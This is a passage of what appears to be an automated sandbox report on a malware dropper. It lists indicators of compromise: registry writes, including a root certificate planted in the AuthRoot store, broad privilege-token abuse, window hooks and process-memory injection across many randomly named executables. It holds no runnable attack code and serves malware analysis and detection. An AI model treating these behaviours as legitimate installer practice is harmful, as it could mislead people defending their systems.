Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" Graphics.exe -
Modifies registry class 1 IoCs
Processes:
WerFault.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings WerFault.exe -
Processes:
ikj0nXK63Ad1yKimPNaQT2y7.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ikj0nXK63Ad1yKimPNaQT2y7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ikj0nXK63Ad1yKimPNaQT2y7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ikj0nXK63Ad1yKimPNaQT2y7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ikj0nXK63Ad1yKimPNaQT2y7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e ikj0nXK63Ad1yKimPNaQT2y7.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pub2.exejfiag3g_gg.exepid process 4212 pub2.exe 4212 pub2.exe 1176 jfiag3g_gg.exe 1176 jfiag3g_gg.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3032 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pub2.exepid process 4212 pub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exedescription pid process Token: SeDebugPrivilege 2760 SoCleanInst.exe Token: SeCreateTokenPrivilege 4692 Install.exe Token: SeAssignPrimaryTokenPrivilege 4692 Install.exe Token: SeLockMemoryPrivilege 4692 Install.exe Token: SeIncreaseQuotaPrivilege 4692 Install.exe Token: SeMachineAccountPrivilege 4692 Install.exe Token: SeTcbPrivilege 4692 Install.exe Token: SeSecurityPrivilege 4692 Install.exe Token: SeTakeOwnershipPrivilege 4692 Install.exe Token: SeLoadDriverPrivilege 4692 Install.exe Token: SeSystemProfilePrivilege 4692 Install.exe Token: SeSystemtimePrivilege 4692 Install.exe Token: SeProfSingleProcessPrivilege 4692 Install.exe Token: SeIncBasePriorityPrivilege 4692 Install.exe Token: SeCreatePagefilePrivilege 4692 Install.exe Token: SeCreatePermanentPrivilege 4692 Install.exe Token: SeBackupPrivilege 4692 Install.exe Token: SeRestorePrivilege 4692 Install.exe Token: SeShutdownPrivilege 4692 Install.exe Token: SeDebugPrivilege 4692 Install.exe Token: SeAuditPrivilege 4692 Install.exe Token: SeSystemEnvironmentPrivilege 4692 Install.exe Token: SeChangeNotifyPrivilege 4692 Install.exe Token: SeRemoteShutdownPrivilege 4692 Install.exe Token: SeUndockPrivilege 4692 Install.exe Token: SeSyncAgentPrivilege 4692 Install.exe Token: SeEnableDelegationPrivilege 4692 Install.exe Token: SeManageVolumePrivilege 4692 Install.exe Token: SeImpersonatePrivilege 4692 Install.exe Token: SeCreateGlobalPrivilege 4692 Install.exe Token: 31 4692 Install.exe Token: 32 4692 Install.exe Token: 33 4692 Install.exe Token: 34 4692 Install.exe Token: 35 4692 Install.exe Token: SeDebugPrivilege 3432 taskkill.exe Token: SeManageVolumePrivilege 4772 md9_1sjm.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeManageVolumePrivilege 4772 md9_1sjm.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 -
Suspicious use of SetWindowsHookEx 19 IoCs
Processes:
exz_y5si_QKvgV12SHnOl8Vv.exec_mukBcitiv6zGCSo47ynarP.exeFQpsZZfGz3m87Jl6jcWI9bSG.exeO2asz6Aj0jmIxGOx8FZlN293.exeikj0nXK63Ad1yKimPNaQT2y7.exeFJjQVURla01Xh9fpC6JaU94b.exeDP8IfkWhlAypXNjWbEMYhZ4_.exeCQPxSqqh31frdIRtYHOHcDzh.exeekfdxVPEJxh3DEsyozUTNiCv.exeTsgtelzQlR8yszDLuNQJXLZi.exek93jCTkUiMxXJrGKLIDgegDv.exeRcy3rf9yZ0fpvi47hqv6iRFs.exeInstall.exeInstall.exeyXXvNULregFXMltBKmOl3yOn.exeOGaewSexDdcUewGNh9MbzlbL.exeEz3PxgX8W6KbcsaZX7zmFHWY.exeSqxEUWFAHrHCWdtUp5Jt44Jq.exeLVScHASJYvW4eC6e8OuZpyLG.exepid process 2712 exz_y5si_QKvgV12SHnOl8Vv.exe 1440 c_mukBcitiv6zGCSo47ynarP.exe 4988 FQpsZZfGz3m87Jl6jcWI9bSG.exe 4656 O2asz6Aj0jmIxGOx8FZlN293.exe 4004 ikj0nXK63Ad1yKimPNaQT2y7.exe 2520 FJjQVURla01Xh9fpC6JaU94b.exe 1920 DP8IfkWhlAypXNjWbEMYhZ4_.exe 836 CQPxSqqh31frdIRtYHOHcDzh.exe 3020 ekfdxVPEJxh3DEsyozUTNiCv.exe 624 TsgtelzQlR8yszDLuNQJXLZi.exe 828 k93jCTkUiMxXJrGKLIDgegDv.exe 3508 Rcy3rf9yZ0fpvi47hqv6iRFs.exe 2996 Install.exe 632 Install.exe 3936 yXXvNULregFXMltBKmOl3yOn.exe 1980 OGaewSexDdcUewGNh9MbzlbL.exe 4080 Ez3PxgX8W6KbcsaZX7zmFHWY.exe 4684 SqxEUWFAHrHCWdtUp5Jt44Jq.exe 4132 LVScHASJYvW4eC6e8OuZpyLG.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exeFolder.exeFiles.exeInstall.execmd.exerUNdlL32.eXesvchost.exeGraphics.execmd.execsrss.exeFile.exedescription pid process target process PID 2236 wrote to memory of 2760 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe SoCleanInst.exe PID 2236 wrote to memory of 2760 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe SoCleanInst.exe PID 2236 wrote to memory of 4772 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe md9_1sjm.exe PID 2236 wrote to memory of 4772 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe md9_1sjm.exe PID 2236 wrote to memory of 4772 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe md9_1sjm.exe PID 2236 wrote to memory of 5044 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Folder.exe PID 2236 wrote to memory of 5044 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Folder.exe PID 2236 wrote to memory of 5044 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Folder.exe PID 2236 wrote to memory of 3944 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Graphics.exe PID 2236 wrote to memory of 3944 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Graphics.exe PID 2236 wrote to memory of 3944 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Graphics.exe PID 2236 wrote to memory of 404 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Updbdate.exe PID 2236 wrote to memory of 404 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Updbdate.exe PID 2236 wrote to memory of 404 2236 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Updbdate.exe PID 2236 wrote to memory of 